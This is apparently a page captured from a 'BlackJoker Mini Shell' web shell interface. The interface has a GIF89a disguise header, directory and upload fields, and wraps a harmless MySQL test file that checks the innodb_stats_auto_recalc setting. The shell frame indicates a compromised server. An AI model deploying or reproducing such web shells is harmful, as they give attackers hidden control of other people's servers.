GIF89a; Mini Shell

Mini Shell

Direktori : /usr/share/mysql-test/suite/sys_vars/t/
Upload File :
Current File : //usr/share/mysql-test/suite/sys_vars/t/innodb_stats_auto_recalc_basic.test

#
# innodb_stats_auto_recalc
#

-- source include/have_innodb.inc

# show the default value
SELECT @@innodb_stats_auto_recalc;

# check that it is writeable
SET GLOBAL innodb_stats_auto_recalc=ON;
SELECT @@innodb_stats_auto_recalc;

SET GLOBAL innodb_stats_auto_recalc=OFF;
SELECT @@innodb_stats_auto_recalc;

SET GLOBAL innodb_stats_auto_recalc=1;
SELECT @@innodb_stats_auto_recalc;

SET GLOBAL innodb_stats_auto_recalc=0;
SELECT @@innodb_stats_auto_recalc;

# should be a boolean
-- error ER_WRONG_VALUE_FOR_VAR
SET GLOBAL innodb_stats_auto_recalc=123;

-- error ER_WRONG_VALUE_FOR_VAR
SET GLOBAL innodb_stats_auto_recalc='foo';

# restore the environment
SET GLOBAL innodb_stats_auto_recalc=default;

./BlackJoker Mini Shell 1.0